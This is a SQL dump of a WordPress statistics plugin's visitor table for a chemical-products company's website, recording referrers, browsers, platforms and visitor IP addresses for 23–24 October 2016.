INSERT INTO `wp_statistics_visitor` VALUES (10472, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.197.22.181', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10473, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.100.174', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10474, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.97', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10475, '2016-10-23', 'https://shinikiev.com.ua/', 'MSIE', 'Windows', '6.0', '', '46.211.197.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10476, '2016-10-23', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '68.4.123.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10477, '2016-10-23', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.7.0', '', '104.197.112.194', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10478, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '166.216.157.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10479, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.167.64', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10480, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10481, '2016-10-23', 'https://www.miller-stephenson.com/miller/adhesive_kits.html', 'MSIE', 'Windows', '9.0', '', '182.118.20.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10482, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.235.78.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10483, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '107.77.92.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10484, '2016-10-23', 'https://komputers-best.ru/', 'MSIE', 'Windows', '7.0b', '', '37.115.187.108', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10485, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.73.70.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10486, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Android', '44.0.2403.133', '', '65.32.184.171', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10487, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '64.150.222.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10488, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.186.181.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10489, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '156.26.36.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10490, '2016-10-23', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '107.10.50.199', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10491, '2016-10-23', 'https://www.bing.com/search?q=krytox+eg+2000+specifications&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10492, '2016-10-23', 'https://www.miller-stephenson.com/product/krytox-eg-2000/', 'MSIE', 'Windows', '9.0', '', '204.79.180.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10493, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.140.30.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10494, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.252.118.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10495, '2016-10-23', 'https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=5&ved=0ahUKEwiGwbvi_fHPAhUCW5QKHe44Bc4QFggzMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '7.0', '', '165.86.71.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10496, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '64.79.85.205', '000', 101, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10497, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.94.112.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10498, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '6.0', '', '64.79.85.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10499, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.95.140.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10500, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10501, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.244.82.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10502, '2016-10-23', 'https://www.miller-stephenson.com/', 'Opera Next', 'Windows', '26.0.1656.60', '', '185.158.119.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10503, '2016-10-23', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '185.158.119.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10504, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.68.244.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10505, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '68.193.177.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10506, '2016-10-23', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1218.kWZP-GmkN4_khqGyMXJpmPVFoN8iII8kJWtmxcs9CsxbJMpgQ3Rox6HvpwjDTG_5.bec897ceb28ca741e848a2489f0cb39a3c1ebbbd&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhUZEJ4Vl9jRFgtVEtKUzNmczlLMjhfNnc3VENvbnZuQVdOM3lMOVpjUnk1aG1zYmRPN0loa2dnSVpiTEZyaFBrdw&b64e=2&sign=636c139a9781dceb4956419197d5f579&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrRor5AmUC8GKp6PCwwzG3V-Q3RWGe1_JTUGeZOqNP8zRaQLUDtr0hCs-XA3vKhLvmYF_qKeMWAiThaw0Hi4dp__1JT3Jnwco_48OiLoqqLTyjyyJBLg6F5e2UWtbs47Vy&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXEfKO1imoOE2lm9aqUJMpZRSgOEziFWLJ56zzehEhNRfA9lIjuZIX7cGX_Xzi6BZEeIBiQyXqhDJusLCPPO4VRoKV8jAtf0Fo&l10n=ru&cts=1477260884400&mc=3.25229073832', 'MSIE', 'Windows', '8.0', '', '37.204.41.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10507, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.219.165.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10508, '2016-10-23', 'https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&cad=rja&uact=8&ved=0ahUKEwjZlPnujvLPAhXEuhQKHS_xAYQQFggsMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Ffluoroguard-pca%2F&usg=AFQjCNE7cOJKzbfi479vjRgOrgGcNnqA2A&bvm=bv.136593572,d.bGg', 'MSIE', 'Windows', '11.0', '', '167.184.214.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10509, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '1.234.254.242', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10510, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10511, '2016-10-23', 'https://www.google.com/', 'Firefox', 'Macintosh', '48.0', '', '24.101.117.12', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10512, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '89.144.58.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10513, '2016-10-24', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '37.247.127.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10514, '2016-10-24', 'https://www.google.ca/', 'Safari', 'iPad', '7.0', '', '192.95.222.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10515, '2016-10-24', 'https://www.miller-stephenson.com/wp-admin/post.php?post=2694&action=edit', 'Firefox', 'Windows', '47.0', '', '24.193.212.151', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10516, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.78.19.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10517, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '3.0.10', '', '54.227.76.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10518, '2016-10-24', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=38', 'MSIE', 'Windows', '9.0', '', '182.118.21.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10519, '2016-10-24', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=38', 'MSIE', 'Windows', '9.0', '', '182.118.21.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10520, '2016-10-24', 'https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&cad=rja&uact=8&ved=0ahUKEwiyt_7Zk_LPAhXMQ48KHR5HD2MQFggvMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA&bvm=bv.136593572,d.bGg', 'MSIE', 'Windows', '11.0', '', '167.184.214.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10521, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '2.62.147.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10522, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10523, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10524, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'Windows', '5.0.4', '', '217.172.40.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10525, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '19.0.1062.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10526, '2016-10-24', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '203.171.229.187', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10527, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 42, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10528, '2016-10-24', 'https://www.miller-stephenson.com', 'BlackBerry Browser', 'BlackBerry', '7.1.0.346', '', '71.7.181.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10529, '2016-10-24', 'https://www.miller-stephenson.com', 'IEMobile', 'Windows Phone', '7.0', '', '37.247.125.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10530, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '35.0.3319.102', '', '162.254.86.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10531, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '95.143.47.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10532, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '27.0', '', '80.79.125.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10533, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '69.61.28.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10534, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2224.3', '', '195.200.217.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10535, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '71.212.90.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10536, '2016-10-24', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.0', '', '71.212.90.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10537, '2016-10-24', 'https://www.miller-stephenson.com', 'IEMobile', 'Windows Phone', '7.0', '', '85.93.22.244', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10538, '2016-10-24', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '80.79.119.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10539, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '5.1.3', '', '63.223.118.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10540, '2016-10-24', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '11.11', '', '69.61.18.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10541, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2225.0', '', '80.79.115.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10542, '2016-10-24', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.14', '', '149.5.113.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10543, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2227.0', '', '185.75.242.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10544, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.116', '', '80.79.113.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10545, '2016-10-24', 'https://www.miller-stephenson.com', 'BlackBerry Browser', 'BlackBerry', '7.0.0.254', '', '149.5.113.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10546, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '93.186.169.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10547, '2016-10-24', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.00', '', '80.79.113.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10548, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.6', '', '99.192.47.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10549, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '185.35.21.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10550, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '185.2.248.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10551, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '75.98.237.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10552, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '27.0', '', '71.212.90.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10553, '2016-10-24', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '185.75.243.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10554, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '5.1', '', '23.226.221.125', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10555, '2016-10-24', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '37.247.127.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10556, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '217.172.44.104', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10557, '2016-10-24', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '11.62', '', '23.239.167.83', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10558, '2016-10-24', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10559, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.65.112.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10560, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '23.226.217.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10561, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '35.0.1916.47', '', '23.239.165.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10562, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '27.0', '', '184.175.66.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10563, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '46.22.213.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10564, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2225.0', '', '217.18.244.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10565, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '33.0.1750.517', '', '63.223.124.243', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10566, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Macintosh', '10.0', '', '99.192.46.255', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10567, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '21.0', '', '69.61.28.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10568, '2016-10-24', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '11.10', '', '107.155.195.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10569, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'Windows', '5.0.4', '', '65.18.196.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10570, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '28.0', '', '12.180.55.51', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10571, '2016-10-24', 'https://r.search.yahoo.com/_ylt=A0LEVzkCWg1Y1hQAeUPBGOd_;_ylu=X3oDMTBydWNmY2MwBGNvbG8DYmYxBHBvcwM0BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1477298819/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fplastic-glass-metal-cleaner%2f/RK=0/RS=Kz9gLOqx.7iGYr7EUxRevbWsTWg-', 'Safari', 'iPad', '9.0', '', '24.187.98.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10572, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '25.0', '', '65.18.194.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10573, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '208.72.119.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10574, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '85.93.24.244', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10575, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '217.18.246.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10576, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '32.0.1664.3', '', '96.46.61.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10577, '2016-10-24', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.14', '', '67.203.1.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10578, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.6', '', '71.212.94.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10579, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '108.82.80.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10580, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '25.0', '', '207.195.228.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10581, '2016-10-24', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.02', '', '162.255.153.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10582, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '65.18.199.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10583, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '32.0.1664.3', '', '71.7.181.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10584, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.111.86.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10585, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 33, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10586, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwib7bTyn_LPAhWJxVQKHeEyDtEQFggsMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&sig2=PCvCoQFeNvGl8Lw_Imy-rg', 'MSIE', 'Windows', '11.0', '', '24.10.141.132', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10587, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.149.218.246', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10588, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '27.153.220.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10589, '2016-10-24', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '99.199.89.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10590, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10591, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.129.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10592, '2016-10-24', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10593, '2016-10-24', 'https://www.google.com.sg/', 'Chrome', 'Windows', '40.0.2214.111', '', '192.190.204.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10594, '2016-10-24', 'https://www.google.co.kr/', 'Safari', 'iPhone', '10.0', '', '112.219.162.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10595, '2016-10-24', 'https://www.baidu.com/link?url=eX8wi03gv2lNcU3mvr9qeT832xE8AwyCJZC_cO0S6UZfKNtYDauNnN3SyBXSUac-&wd=&eqid=a7aa1dce0001cb6a00000004580d6900', 'Chrome', 'Windows', '45.0.2454.101', '', '222.212.205.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10596, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.56.0.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10597, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.124.47.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10598, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.197.131.117', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10599, '2016-10-24', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '116.6.51.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10600, '2016-10-24', 'https://search.yahoo.co.jp/search?p=%E3%82%AF%E3%83%A9%E3%82%A4%E3%83%88%E3%83%83%E3%82%AF%E3%82%B9%EF%BC%92%EF%BC%94%EF%BC%90%EF%BC%A1%EF%BC%BA&aq=-1&oq=&ei=UTF-8&fr=bb_top_v2_sa&x=wrt', 'MSIE', 'Windows', '11.0', '', '180.21.33.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10601, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.69.237.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10602, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.135.238.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10603, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.172.244', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10604, '2016-10-24', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '66.56.33.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10605, '2016-10-24', 'https://globalwits.globalsou.com/crawl/searchResult.asp?id=55922', 'Chrome', 'Windows', '45.0.2454.101', '', '174.139.160.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10606, '2016-10-24', 'https://astana.xkaz.org/', 'MSIE', 'Unknown', '7.0b', '', '178.137.167.230', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10607, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.187.0.112', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10608, '2016-10-24', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=41', 'MSIE', 'Windows', '9.0', '', '182.118.20.237', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10609, '2016-10-24', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '24.106.220.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10610, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10611, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '21.0', '', '46.229.173.131', '000', 1, 0); 
